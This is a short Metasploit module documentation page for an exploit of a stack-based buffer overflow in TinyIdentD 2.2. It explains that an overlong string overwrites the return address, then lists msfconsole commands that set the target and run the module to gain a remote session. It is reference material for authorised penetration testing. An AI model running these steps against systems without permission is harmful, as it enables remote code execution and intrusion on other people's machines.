Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/windows/misc/tiny_identd_overflow.md
Views: 11789
Vulnerable Application
This module exploits a stack based buffer overflow in TinyIdentD version 2.2.
If we send a long string to the ident service we can overwrite the return address and execute arbitrary code. Credit to Maarten Boone.
Download:
Verification Steps
Start
msfconsole
use exploit/windows/misc/tiny_identd_overflow
set RHOSTS <rhost>
set TARGET <target>
run
You should get a new session